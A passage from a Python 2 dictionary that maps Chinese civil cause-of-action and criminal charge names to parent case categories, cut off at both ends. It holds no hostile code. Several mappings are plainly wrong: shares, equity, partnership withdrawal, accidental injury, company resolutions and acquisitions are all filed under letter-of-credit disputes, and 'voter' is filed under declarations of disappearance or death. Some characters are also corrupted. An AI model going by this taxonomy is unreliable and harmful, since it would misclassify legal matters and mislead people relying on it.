u'合同纠纷',\r\n u'典当': u'合同纠纷',\r\n u'企业名称(商号)使用合同纠纷': u'知识产权合同纠纷',\r\n u'离婚后损害责任纠纷': u'婚姻家庭纠纷',\r\n u'确认合同效力纠纷': u'合同纠纷',\r\n u'公益事业捐赠': u'合同纠纷',\r\n u'战时故意提供虚假敌情罪': u'危害国防利益罪',\r\n u'招标投标': u'合同纠纷',\r\n u'技术咨询': u'知识产权合同纠纷',\r\n u'航道港口疏浚合同纠纷': u'海事海商纠纷',\r\n u'容留他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'出版者权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'背信运用受托财产罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法持有国家绝密、机密文件、资料、物品罪': u'妨害社会管理秩序罪',\r\n u'国有公司、企业、事业单位人员失职罪': u'破坏社会主义市场经济秩序罪',\r\n u'外观设计': u'知识产权权属侵权纠纷',\r\n u'丢失枪支不报罪': u'危害公共安全罪',\r\n u'海运集装箱': u'海事海商纠纷',\r\n u'民用核设施损害责任纠纷': u'侵权责任纠纷',\r\n u'商标代理合同纠纷': u'知识产权合同纠纷',\r\n u'过失泄露军事秘密罪': u'军人违反职责罪',\r\n u'出具证明文件重大失实罪': u'破坏社会主义市场经济秩序罪',\r\n u'高利转贷罪': u'破坏社会主义市场经济秩序罪',\r\n u'贷款诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'专利权转让合同纠纷': u'知识产权合同纠纷',\r\n u'航空旅客运输合同纠纷': u'合同纠纷',\r\n u'动产抵押权纠纷': u'担保物权纠纷',\r\n u'过失提供不合格武器装备、军事设施罪': u'危害国防利益罪',\r\n u'修理': u'物权保护纠纷',\r\n u'兼并': u'与企业有关的纠纷',\r\n u'建筑物区分': u'物权保护纠纷',\r\n u'失踪人债务支付纠纷': u'宣告失踪、宣告死亡案件',\r\n u'证券内幕交易责任纠纷': u'证券纠纷',\r\n u'背叛国家罪': u'危害国家安全罪',\r\n u'建设工程施工合同纠纷': u'合同纠纷',\r\n u'破坏生产经营罪': u'侵犯财产罪',\r\n u'定价': u'垄断纠纷',\r\n u'非法狩猎罪': u'妨害社会管理秩序罪',\r\n u'非法生产、买卖、运输制毒物品、走私制毒物品罪': u'妨害社会管理秩序罪',\r\n u'经营秘密许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'公司清算': u'与公司有关的纠纷',\r\n u'占有物损害赔偿纠纷': u'占有保护纠纷',\r\n u'航空运输损害责任纠纷': u'侵权责任纠纷',\r\n u'因申请诉前停止侵害专利权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'地役权': u'用益物权纠纷',\r\n u'操纵证券交易市场责任纠纷': u'证券纠纷',\r\n u'土地承包经营权转让合同纠纷': u'合同纠纷',\r\n u'地面施工、地下设施损害责任纠纷': u'侵权责任纠纷',\r\n u'盗掘古文化遗址、古墓葬罪': u'妨害社会管理秩序罪',\r\n u'承包': u'合同纠纷',\r\n u'关联交易': u'信用证纠纷',\r\n u'水域': u'海事海商纠纷',\r\n u'非法占用农用地罪': u'妨害社会管理秩序罪',\r\n u'管理人责任': u'与破产有关的纠纷',\r\n u'海洋开发': u'海事海商纠纷',\r\n u'执行分配方案异议之诉': u'执行异议之诉',\r\n u'非法制造、出售非法制造的发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'单位行贿罪': u'贪污贿赂罪',\r\n u'股份合作制': u'与企业有关的纠纷',\r\n u'许可': u'行政管理与行政行为',\r\n u'知识产权': u'知识产权权属侵权纠纷',\r\n u'低价倾销不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'建筑物和其他土地附着物抵押权纠纷': u'担保物权纠纷',\r\n u'暴力危及飞行安全罪': u'危害公共安全罪',\r\n u'业主知情权纠纷': u'所有权纠纷',\r\n u'串通投标': u'不正当竞争纠纷',\r\n u'付款请求': u'信用证纠纷',\r\n u'进出口': u'合同纠纷',\r\n u'赌博罪': u'妨害社会管理秩序罪',\r\n u'伪造、变造金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请宣告公民': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'船舶污染': u'海事海商纠纷',\r\n u'伪造、盗窃、买卖、非法提供、非法使用武装部队专用标志罪': u'危害国防利益罪',\r\n u'植物新品种权转让合同纠纷': u'知识产权合同纠纷',\r\n u'以物抵债协议': u'合同纠纷',\r\n u'因申请海关知识产权保护措施损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'虚假宣传纠纷': u'不正当竞争纠纷',\r\n u'海上通海水域人身损害责任纠纷': u'海事海商纠纷',\r\n u'运送他人偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'供用气合同纠纷': u'合同纠纷',\r\n u'经济补偿': u'劳动争议',\r\n u'业主专有权纠纷': u'所有权纠纷',\r\n u'出版合同纠纷': u'知识产权合同纠纷',\r\n 
u'安置补偿': u'合同纠纷',\r\n u'法律服务合同纠纷': u'合同纠纷',\r\n u'不当得利': u'不当得利纠纷',\r\n u'海洋': u'海事海商纠纷',\r\n u'附义务赠与合同纠纷': u'合同纠纷',\r\n u'伪造、变造、买卖身份证件罪': u'妨害社会管理秩序罪',\r\n u'种子产品质量': u'侵权责任纠纷',\r\n u'隐私权': u'人格权纠纷',\r\n u'破坏易燃易爆设备罪': u'危害公共安全罪',\r\n u'因申请诉前财产保全损害责任纠纷': u'侵权责任纠纷',\r\n u'建设工程价款优先受偿权纠纷': u'合同纠纷',\r\n u'行纪合同': u'合同纠纷',\r\n u'以危险方法危害公共安全罪': u'危害公共安全罪',\r\n u'企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'新增资本认购纠纷': u'与公司有关的纠纷',\r\n u'保险代位': u'保险纠纷',\r\n u'故意延误投递邮件罪': u'妨害社会管理秩序罪',\r\n u'申请确定监护人': u'监护权特别程序案件',\r\n u'房屋拆迁安置补偿合同纠纷': u'合同纠纷',\r\n u'仲裁程序中的财产保全': u'申请保全案件',\r\n u'医疗保险待遇纠纷': u'劳动争议',\r\n u'集成电路布图设计创作合同纠纷': u'知识产权合同纠纷',\r\n u'金融不良债权': u'合同纠纷',\r\n u'使用权纠纷': u'所有权纠纷',\r\n u'房屋租赁': u'合同纠纷',\r\n u'水上运输损害责任纠纷': u'侵权责任纠纷',\r\n u'相邻关系纠纷': u'所有权纠纷',\r\n u'战时临阵脱逃罪': u'军人违反职责罪',\r\n u'非法生产、销售专用间谍器材、窃听、窃照专用器材罪': u'妨害社会管理秩序罪',\r\n u'遗赠扶养协议纠纷': u'继承纠纷',\r\n u'拒传、假传军令罪': u'军人违反职责罪',\r\n u'公共道路妨碍通行损害责任纠纷': u'侵权责任纠纷',\r\n u'倒卖车票、船票罪': u'破坏社会主义市场经济秩序罪',\r\n u'利用极端主义破坏法律实施罪': u'危害公共安全罪',\r\n u'阻碍军事行动罪': u'危害国防利益罪',\r\n u'非法经营同类营业罪': u'破坏社会主义市场经济秩序罪',\r\n u'破坏交通工具罪': u'危害公共安全罪',\r\n u'海事请求担保纠纷': u'海事海商纠纷',\r\n u'非法获取军事秘密罪': u'军人违反职责罪',\r\n u'组织、利用会道门、邪教组织、利用迷信破坏法律实施罪': u'妨害社会管理秩序罪',\r\n u'妨害国境卫生检疫罪': u'妨害社会管理秩序罪',\r\n u'隐瞒、谎报军情罪': u'军人违反职责罪',\r\n u'取舍权': u'用益物权纠纷',\r\n u'确认不侵害专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'行使撤销权': u'合同纠纷',\r\n u'擅自出卖、转让军队房地产罪': u'军人违反职责罪',\r\n u'破坏集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n u'知识产权质押合同纠纷': u'知识产权合同纠纷',\r\n u'存单质权纠纷': u'担保物权纠纷',\r\n u'供用热力': u'合同纠纷',\r\n u'股票': u'信用证纠纷',\r\n u'进出口押汇': u'合同纠纷',\r\n u'提供劳务者致害责任纠纷': u'侵权责任纠纷',\r\n u'确认收养关系纠纷': u'婚姻家庭纠纷',\r\n u'非法转让、倒卖土地使用权罪': u'破坏社会主义市场经济秩序罪',\r\n u'诉前': u'申请诉前停止侵害知识产权案件',\r\n u'妨害清算罪': u'破坏社会主义市场经济秩���罪',\r\n u'证券虚假': u'证券纠纷',\r\n u'发明专利临时保护期使用费纠纷': u'知识产权权属侵权纠纷',\r\n u'信用证诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'共有权确认纠纷': u'所有权纠纷',\r\n u'商标权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'被撤销死亡宣告人请求返还财产纠纷': u'宣告失踪、宣告死亡案件',\r\n u'假冒注册商标罪': u'破坏社会主义市场经济秩序罪',\r\n u'农村建房施工合同纠纷': u'合同纠纷',\r\n u'存管': u'证券纠纷',\r\n u'窃取、收买、非法提供信用卡信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'船舶建造合同纠纷': u'海事海商纠纷',\r\n u'网络域名权属纠纷': u'知识产权权属侵权纠纷',\r\n u'隐藏物返还纠纷': u'所有权纠纷',\r\n u'失业保险待遇纠纷': u'劳动争议',\r\n u'非法携带枪支、弹药、管制刀具、危险物品危及公共安全罪': u'危害公共安全罪',\r\n u'企业租赁经营合同纠纷': u'与企业有关的纠纷',\r\n u'过户': u'所有权纠纷',\r\n u'义务帮工人受害责任纠纷': u'侵权责任纠纷',\r\n u'引诱未成年人聚众淫乱罪': u'妨害社会管理秩序罪',\r\n u'意外伤害': u'信用证纠纷',\r\n u'专利代理合同纠纷': u'知识产权合同纠纷',\r\n u'企业名称(商号)合同纠纷': u'知识产权合同纠纷',\r\n u'打捞': u'海事海商纠纷',\r\n u'诈骗罪': u'侵犯财产罪',\r\n u'商标权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权确认纠纷': u'用益物权纠纷',\r\n u'决水罪': u'危害公共安全罪',\r\n u'复制权': u'知识产权权属侵权纠纷',\r\n u'技术中介': u'知识产权合同纠纷',\r\n u'房地产开发经营': u'合同纠纷',\r\n u'销售侵权复制品罪': u'破坏社会主义市场经济秩序罪',\r\n u'职工破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'证券欺诈责任纠纷': u'证券纠纷',\r\n u'广播电视播放': u'知识产权合同纠纷',\r\n u'共有纠纷': u'所有权纠纷',\r\n u'操纵证券、期货市场罪': u'破坏社会主义市场经济秩序罪',\r\n u'商检失职罪': u'渎职罪',\r\n u'股权': u'信用证纠纷',\r\n u'恢复限制': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'保险费纠纷': u'保险纠纷',\r\n u'铁路包裹': u'合同纠纷',\r\n u'集成电路布图设计专有权转让合同纠纷': u'知识产权合同纠纷',\r\n u'捕捞权纠纷': u'用益物权纠纷',\r\n u'盈余分配': u'与公司有关的纠纷',\r\n u'商标代理': u'知识产权合同纠纷',\r\n u'非法获取国家秘密罪': u'妨害社会管理秩序罪',\r\n u'经营者': u'垄断纠纷',\r\n u'民间借贷': u'合同纠纷',\r\n u'商业贿赂不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'虐待被监护、看护人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'音像制品': u'知识产权权属侵权纠纷',\r\n u'船舶经营管理合同纠纷': u'海事海商纠纷',\r\n u'租赁合同纠纷': u'合同纠纷',\r\n u'发现权纠纷': u'知识产权权属侵权纠纷',\r\n u'伪造、变造、买卖国家机关公文、证件、印章罪': u'妨害社会管理秩序罪',\r\n u'退伙': u'信用证纠纷',\r\n u'企业出售合同纠纷': u'与企业有关的纠纷',\r\n u'盈余': u'信用证纠纷',\r\n u'建设用地使用权转让合同': u'合同纠纷',\r\n u'过失损坏武器装备、军事设施、军事通信罪': u'危害国防利益罪',\r\n u'辩护人、诉讼代理人毁灭证据、伪造证据、妨害作证罪': u'妨害社会管理秩序罪',\r\n u'非法侵入计算机信息系统罪': u'妨害社会管理秩序罪',\r\n u'法定继承纠纷': u'继承纠纷',\r\n u'失职致使在押人员脱逃罪': 
u'渎职罪',\r\n u'拒不执行判决、裁定罪': u'妨害社会管理秩序罪',\r\n u'租赁协议': u'合同纠纷',\r\n u'证券登记存管结算纠纷': u'证券纠纷',\r\n u'身体': u'人格权纠纷',\r\n u'铁路货物运输合同纠纷': u'合同纠纷',\r\n u'收回': u'行政管理与行政行为',\r\n u'非法捕捞水产品罪': u'妨害社会管理秩序罪',\r\n u'破坏武器装备、军事设施、军事通信罪': u'危害国防利益罪',\r\n u'工资': u'劳动争议',\r\n u'公司决议': u'信用证纠纷',\r\n u'保管合同': u'合同纠纷',\r\n u'专利合同纠纷': u'知识产权合同纠纷',\r\n u'保管合同纠纷': u'合同纠纷',\r\n u'出版者权': u'知识产权权属侵权纠纷',\r\n u'专利合同': u'知识产权合同纠纷',\r\n u'光船租赁合同纠纷': u'海事海商纠纷',\r\n u'侵害特殊标志专有权纠纷': u'知识产权权属侵权纠纷',\r\n u'欺诈客户责任纠纷': u'证券纠纷',\r\n u'认购': u'与公司有��的纠纷',\r\n u'特许经营': u'知识产权权属侵权纠纷',\r\n u'赡养': u'婚姻家庭纠纷',\r\n u'海关知识产权': u'知识产权权属侵权纠纷',\r\n u'铁路行李运输合同纠纷': u'合同纠纷',\r\n u'广播': u'知识产权权属侵权纠纷',\r\n u'非法剥夺公民宗教信仰自由罪': u'侵犯公民人身权利、民主权利罪',\r\n u'记载': u'信用证纠纷',\r\n u'股东知情权纠纷': u'与公司有关的纠纷',\r\n u'交通事故': u'侵权责任纠纷',\r\n u'返还': u'合同纠纷',\r\n u'著作权转让合同纠纷': u'知识产权合同纠纷',\r\n u'著作权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'集成电路布图设计许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'借贷': u'合同纠纷',\r\n u'海上通海水域保赔合同纠纷': u'海事海商纠纷',\r\n u'房屋拆迁安置': u'合同纠纷',\r\n u'违反安全保障义务责任纠纷': u'侵权责任纠纷',\r\n u'虐待俘虏罪': u'军人违反职责罪',\r\n u'包销': u'证券纠纷',\r\n u'国际铁路联运合同纠纷': u'合同纠纷',\r\n u'航空货物运输合同纠纷': u'合同纠纷',\r\n u'拒不支付劳动报酬罪': u'侵犯财产罪',\r\n u'提供虚假证明文件罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司减资': u'与公司有关的纠纷',\r\n u'建设用地使用权出让合同': u'合同纠纷',\r\n u'违法': u'行政管理与行政行为',\r\n u'供用气': u'合同纠纷',\r\n u'虐待部属罪': u'军人违反职责罪',\r\n u'航次': u'海事海商纠纷',\r\n u'船舶权属纠纷': u'海事海商纠纷',\r\n u'过失致人死亡罪': u'侵犯公民人身权利、民主权利罪',\r\n u'海上通海水域保险合同纠纷': u'海事海商纠纷',\r\n u'铁路货物': u'合同纠纷',\r\n u'走私核材料罪': u'破坏社会主义市场经济秩序罪',\r\n u'货运代理': u'合同纠纷',\r\n u'商标权转让合同纠纷': u'知识产权合同纠纷',\r\n u'申请认定财产无主': u'认定财产无主案件',\r\n u'汇票': u'信用证纠纷',\r\n u'证券投资咨询纠纷': u'证券纠纷',\r\n u'商品房委托代理销售合同纠纷': u'合同纠纷',\r\n u'非法组织卖血罪': u'妨害社会管理秩序罪',\r\n u'刑讯逼供罪': u'侵犯公民人身权利、民主权利罪',\r\n u'航空货物运输': u'合同纠纷',\r\n u'管道运输合同纠纷': u'合同纠纷',\r\n u'软件著作权': u'知识产权权属侵权纠纷',\r\n u'枉法仲裁罪': u'渎职罪',\r\n u'清偿': u'信用证纠纷',\r\n u'返还电费': u'合同纠纷',\r\n u'采矿权转让合同纠纷': u'合同纠纷',\r\n u'劳务合同纠纷': u'合同纠纷',\r\n u'申请公司清算': u'与公司有关的纠纷',\r\n u'债务转移': u'合同纠纷',\r\n u'组织他人偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'申请认可和执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'集成电路布图设计专有权': u'知识产权权属侵权纠纷',\r\n u'合伙企业财产份额转让纠纷': u'合伙企业纠纷',\r\n u'妨害作证罪': u'妨害社会管理秩序罪',\r\n u'重整': u'与破产有关的纠纷',\r\n u'遗失物返还': u'所有权纠纷',\r\n u'邻接权许可': u'知识产权合同纠纷',\r\n u'质权纠纷': u'担保物权纠纷',\r\n u'技术进口': u'知识产权合同纠纷',\r\n u'生育': u'劳动争议',\r\n u'运输合同纠纷': u'合同纠纷',\r\n u'虚开发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'滥用': u'垄断纠纷',\r\n u'侵犯公民个人信息罪': u'侵犯公民人身权利、民主权利罪',\r\n u'诋毁': u'不正当竞争纠纷',\r\n u'职务发明创造发明人设计人奖励报酬纠纷': u'知识产权权属侵权纠纷',\r\n u'申请执行人执行异议之诉': u'执行异议之诉',\r\n u'申请认可和执行澳门特别行政区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'强迫他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'专利申请权': u'知识产权权属侵权纠纷',\r\n u'掩饰、隐瞒犯罪所得、犯罪所得收益罪': u'妨害社会管理秩序罪',\r\n u'悬赏广告纠纷': u'合同纠纷',\r\n u'治安管理': u'行政管理与行政行为',\r\n u'作品': u'知识产权权属侵权纠纷',\r\n u'运输船舶承包': u'海事海商纠纷',\r\n u'掠夺定价纠纷': u'垄断纠纷',\r\n u'占有、使用高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n u'选民': u'宣告失踪、宣告死亡案件',\r\n u'著作权民事纠纷': u'知识产权权属侵权纠纷',\r\n u'委托开立信用证纠纷': u'信用证纠纷',\r\n u'国有土地使用权处理决定': u'行政管理与行政行为',\r\n u'表演者权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'展览': u'合同纠纷',\r\n u'公共场所管理人责任纠纷': u'侵权责任纠纷',\r\n u'破坏界碑、界桩罪': u'妨害社会管理秩序罪',\r\n u'托管': u'信用证纠纷',\r\n u'扰乱法庭秩序罪': u'妨害社会管理秩序罪',\r\n u'财会服务': u'合同纠纷',\r\n u'医疗事故罪': u'妨害社会管理秩序罪',\r\n u'申请宣告公民死亡': u'宣告失踪、宣告死亡案件',\r\n u'侵害作品广播权纠纷': u'知识产权权属侵权纠纷',\r\n u'出租汽车运输': u'合同纠纷',\r\n u'海洋开发利用纠纷': u'海事海商纠纷',\r\n u'请求撤销个别清偿行为纠纷': u'与破产有关的纠纷',\r\n u'期货内幕': u'期货交易纠纷',\r\n u'铁路运输损害责任纠纷': u'侵权责任纠纷',\r\n u'产品责任纠纷': u'侵权责任纠纷',\r\n u'渔业承包合同纠纷': u'合同纠纷',\r\n u'逃汇罪': u'破坏社会主义市场经济秩序罪',\r\n u'煽动民族仇恨、民族歧视罪': u'侵犯公民人身权利、民主权利罪',\r\n u'发起人': u'信用证纠纷',\r\n u'重大劳动安全事故罪': u'危害公共安全罪',\r\n u'赠与合同': u'合同纠纷',\r\n u'城市公交运输合同纠纷': u'合同纠纷',\r\n u'收购': u'信用证纠纷',\r\n 
u'分家析产纠纷': u'婚姻家庭纠纷',\r\n u'离婚后财产纠纷': u'婚姻家庭纠纷',\r\n u'武装叛乱、暴乱罪': u'危害国家安全罪',\r\n u'建设工程设计合同纠纷': u'合同纠纷',\r\n u'污染环境罪': u'妨害社会管理秩序罪',\r\n u'建设工程勘察合同纠纷': u'合同纠纷',\r\n u'房屋': u'所有权纠纷',\r\n u'技术秘密许可': u'知识产权合同纠纷',\r\n u'货运代理合同纠纷': u'合同纠纷',\r\n u'质押合同纠纷': u'合同纠纷',\r\n u'高度危险': u'侵权责任纠纷',\r\n u'信用卡诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'再保险': u'保险纠纷',\r\n u'出售出入境证件罪': u'妨害社会管理秩序罪',\r\n u'保证保险合同纠纷': u'保险纠纷',\r\n u'保险经纪': u'保险纠纷',\r\n u'建筑工程': u'合同纠纷',\r\n u'公益事业捐赠合同纠纷': u'合同纠纷',\r\n u'保安服务': u'合同纠纷',\r\n u'公路货物运输合同纠纷': u'合同纠纷',\r\n u'共有物': u'所有权纠纷',\r\n u'疏浚': u'海事海商纠纷',\r\n u'共有人优先购买权纠纷': u'所有权纠纷',\r\n u'争议': u'信用证纠纷',\r\n u'银行结算': u'合同纠纷',\r\n u'技术合作开发合同纠纷': u'知识产权合同纠纷',\r\n u'水污染责任纠纷': u'侵权责任纠纷',\r\n u'投放虚假危险物质罪': u'妨害社会管理秩序罪',\r\n u'股东出资': u'信用证纠纷',\r\n u'婚约': u'婚姻家庭纠纷',\r\n u'人民调解协议': u'合同纠纷',\r\n u'股东损害': u'与公司有关的纠纷',\r\n u'船舶检验合同纠纷': u'海事海商纠纷',\r\n u'行贿罪': u'贪污贿赂罪',\r\n u'遗失武器装备罪': u'军人违反职责罪',\r\n u'生产、销售不符合安全标准的产品罪': u'破坏社会主义市场经济秩序罪',\r\n u'过失以危险方法危害公共安全罪': u'危害公共安全罪',\r\n u'票据质权纠纷': u'担保物权纠纷',\r\n u'横向垄断协议纠纷': u'垄断纠纷',\r\n u'公司设立纠纷': u'与公司有关的纠纷',\r\n u'家政服务': u'合同纠纷',\r\n u'海事债权': u'海事海商纠纷',\r\n u'因申请知识产权临时措施损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'走私贵重金属罪': u'破坏社会主义市场经济秩序罪',\r\n u'海域使用权': u'用益物权纠纷',\r\n u'淫秽': u'妨害社会管理秩序罪',\r\n u'占有消除危险纠纷': u'占有保护纠纷',\r\n u'公益信托纠纷': u'信托纠纷',\r\n u'虚假宣传': u'不正当竞争纠纷',\r\n u'放行偷越国(边)境人员罪': u'渎职罪',\r\n u'爆炸罪': u'危害公共安全罪',\r\n u'商标合同': u'知识产权合同纠纷',\r\n u'共有权确认': u'所有权纠纷',\r\n u'车库纠纷': u'所有权纠纷',\r\n u'多式联运': u'合同纠纷',\r\n u'离退休': u'合同纠纷',\r\n u'建设工程': u'合同纠纷',\r\n u'确认仲裁': u'仲裁程序案件',\r\n u'请求确认人民调解协议效力': u'合同纠纷',\r\n u'建设用地使用权合同纠纷': u'合同纠纷',\r\n u'采矿权': u'用益物权纠纷',\r\n u'抢夺罪': u'侵犯财产罪',\r\n u'别除': u'与破产有关的纠纷',\r\n u'建设工程监理合同纠纷': u'合同纠纷',\r\n u'表演者': u'知识产权权属侵权纠纷',\r\n u'生产、销售假药罪': u'破坏社会主义市场经济秩序罪',\r\n u'外商独资企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'侵害企业出资人权益纠纷': u'与企业有关的纠纷',\r\n u'低价倾销': u'不正当竞争纠纷',\r\n u'贷款纠纷': u'合同纠纷',\r\n u'机动���': u'侵权责任纠纷',\r\n u'票据追索权纠纷': u'票据纠纷',\r\n u'海商': u'海事海商纠纷',\r\n u'组织、利用会道门、邪教组织、利用迷信致人重伤、死亡罪': u'妨害社会管理秩序罪',\r\n u'荣誉权纠纷': u'人格权纠纷',\r\n u'股权转让': u'信用证纠纷',\r\n u'技术合作': u'知识产权权属侵权纠纷',\r\n u'确认不侵害知识产权纠纷': u'知识产权权属侵权纠纷',\r\n u'不动产登记': u'不动产登记纠纷',\r\n u'期货内幕交易责任纠纷': u'期货交易纠纷',\r\n u'伪造、变造、买卖武装部队公文、证件、印章罪': u'危害国防利益罪',\r\n u'撤销房产证': u'行政管理与行政行为',\r\n u'医疗合作': u'合同纠纷',\r\n u'用人单位责任纠纷': u'侵权责任纠纷',\r\n u'过失损坏易燃易爆设备罪': u'危害公共安全罪',\r\n u'海事担保': u'海事海商纠纷',\r\n u'水路货物运输': u'合同纠纷',\r\n u'进出口信用保险': u'保险纠纷',\r\n u'产品': u'侵权责任纠纷',\r\n u'职务侵占罪': u'侵犯财产罪',\r\n u'分立': u'信用证纠纷',\r\n u'违法运用资金罪': u'破坏社会主义市场经济秩序罪',\r\n u'土壤污染责任纠纷': u'侵权责任纠纷',\r\n u'采集、供应血液、制作、供应血液制品事故罪': u'妨害社会管理秩序罪',\r\n u'侵害集体经济组织成员权益纠纷': u'所有权纠纷',\r\n u'人身自由权纠纷': u'人格权纠纷',\r\n u'登记': u'行政管理与行政行为',\r\n u'伪证罪': u'妨害社会管理秩序罪',\r\n u'船舶买卖合同纠纷': u'海事海商纠纷',\r\n u'电信服务': u'合同纠纷',\r\n u'著作权归属': u'知识产权权属侵权纠纷',\r\n u'不正当竞争': u'不正当竞争纠纷',\r\n u'车辆租赁合同纠纷': u'合同纠纷',\r\n u'海事证据保全': u'海事诉讼特别程序案件',\r\n u'债权转让合同纠纷': u'合同纠纷',\r\n u'生产、销售伪劣产品罪': u'破坏社会主义市场经济秩序罪',\r\n u'出售、购买、运输假币罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司分立': u'与公司有关的纠纷',\r\n u'商品房预售合同纠纷': u'合同纠纷',\r\n u'申请中止支付信用证项下款项': u'申请保全案件',\r\n u'补偿贸易纠纷': u'合同纠纷',\r\n u'侵害作品发行权纠纷': u'知识产权权属侵权纠纷',\r\n u'所有权确认纠纷': u'物权保护纠纷',\r\n u'动植物检疫失职罪': u'渎职罪',\r\n u'披露、报道不应公开的案件信息罪': u'妨害社会管理秩序罪',\r\n u'运输': u'合同纠纷',\r\n u'徇私枉法罪': u'渎职罪',\r\n u'危险驾驶罪': u'危害公共安全罪',\r\n u'船舶修理合同纠纷': u'海事海商纠纷',\r\n u'用人': u'劳动争议',\r\n u'植物新品种权权属': u'知识产权权属侵权纠纷',\r\n u'银行卡': u'合同纠纷',\r\n u'兑付': u'信用证纠纷',\r\n u'确认合同': u'合同纠纷',\r\n u'著作权许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'码头': u'海事海商纠纷',\r\n u'海': u'海事海商纠纷',\r\n u'公司制': u'与企业有关的纠纷',\r\n u'过失损坏交通设施罪': u'危害公共安全罪',\r\n u'水路旅客运输': u'合同纠纷',\r\n u'侵犯通信自由罪': u'侵犯公民人身权利、民主权利罪',\r\n 
u'合作开发房地产': u'合同纠纷',\r\n u'旅店服务合同纠纷': u'合同纠纷',\r\n u'申请扣押船舶': u'海事诉讼特别程序案件',\r\n u'侵权损害赔偿': u'侵权责任纠纷',\r\n u'非全日制用工纠纷': u'劳动争议',\r\n u'大气污染责任纠纷': u'侵权责任纠纷',\r\n u'电信服务合同纠纷': u'合同纠纷',\r\n u'申请拍卖扣押船舶': u'海事诉讼特别程序案件',\r\n u'抵押合同纠纷': u'合同纠纷',\r\n u'不履行': u'行政管理与行政行为',\r\n u'债务人行为无': u'与破产有关的纠纷',\r\n u'商品房预约合同纠纷': u'合同纠纷',\r\n u'隐匿、故意销毁会计凭证、会计帐簿、财务会计报告罪': u'破坏社会主义市场经济秩序罪',\r\n u'军人叛逃罪': u'军人违反职责罪',\r\n u'妨害动植物防疫、检疫罪': u'妨害社会管理秩序罪',\r\n u'非法制造、买卖、运输、储存危险物质罪': u'危害公共安全罪',\r\n u'土地租赁': u'合同纠纷',\r\n u'走私、贩卖、运输、制造毒品罪': u'妨害社会管理秩序罪',\r\n u'担保物权确认纠纷': u'物权保护纠纷',\r\n u'社会保险': u'劳动争议',\r\n u'保全': u'申请保全案件',\r\n u'管理人责任纠纷': u'与破产有关的纠纷',\r\n u'环境保护': u'侵权责任纠纷',\r\n u'订作': u'合同纠纷',\r\n u'触电': u'侵权责任纠纷',\r\n u'虚假诉讼罪': u'妨害社会管理秩序罪',\r\n u'故意泄露国家秘密罪': u'渎职罪',\r\n u'专利权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'出资人': u'与企业有关的纠纷',\r\n u'设立': u'信用证纠纷',\r\n u'暴力干涉婚姻自由罪': u'侵犯公民人身权利、民主权利罪',\r\n u'国家机关工作人员签订、履行合同失职被骗罪': u'渎职罪',\r\n u'公司盈余分配纠纷': u'与公司有关的纠纷',\r\n u'抢劫枪支、弹药、爆炸物、危险物质罪': u'危害公共安全罪',\r\n u'虚假广告罪': u'破坏社会主义市场经济秩序罪',\r\n u'金融借款': u'合同纠纷',\r\n u'海上通海水域旅客运输合同纠纷': u'海事海商纠纷',\r\n u'航空运输财产损害责任纠纷': u'侵权责任纠纷',\r\n u'监护人': u'监护权特别程序案件',\r\n u'过失损坏交通工具罪': u'危害公共安全罪',\r\n u'环境监管失职罪': u'渎职罪',\r\n u'证券投资基金交易纠纷': u'证券纠纷',\r\n u'减资': u'信用证纠纷',\r\n u'有价证券诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'注册商标专用权': u'知识产权权属侵权纠纷',\r\n u'走私文物罪': u'破坏社会主义市场经济秩序罪',\r\n u'传染病菌种、毒种扩散罪': u'妨害社会管理秩序罪',\r\n u'骗取出境证件罪': u'妨害社会管理秩序罪',\r\n u'借记卡纠纷': u'合同纠纷',\r\n u'撤销婚姻纠纷': u'婚姻家庭纠纷',\r\n u'撤销建设工程': u'行政管理与行政行为',\r\n u'因申请诉前停止侵害植物新品种权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'票据返还请求权纠纷': u'票据纠纷',\r\n u'建设用地使用权': u'用益物权纠纷',\r\n u'植物新品种申请权转让合同纠纷': u'知识产权合同纠纷',\r\n u'船舶属具保管合同纠纷': u'海事海商纠纷',\r\n u'擅离、玩忽军事职守罪': u'军人违反职责罪',\r\n u'侵害作品表演权纠纷': u'知识产权权属侵权纠纷',\r\n u'分裂国家罪': u'危害国家安全罪',\r\n u'姓名权纠纷': u'人格权纠纷',\r\n u'庆典服务': u'合同纠纷',\r\n u'国际货物': u'合同纠纷',\r\n u'技术合同': u'知识产权合同纠纷',\r\n u'财产损害赔偿纠纷': u'物权保护纠纷',\r\n u'广告': u'合同纠纷',\r\n u'证券上市': 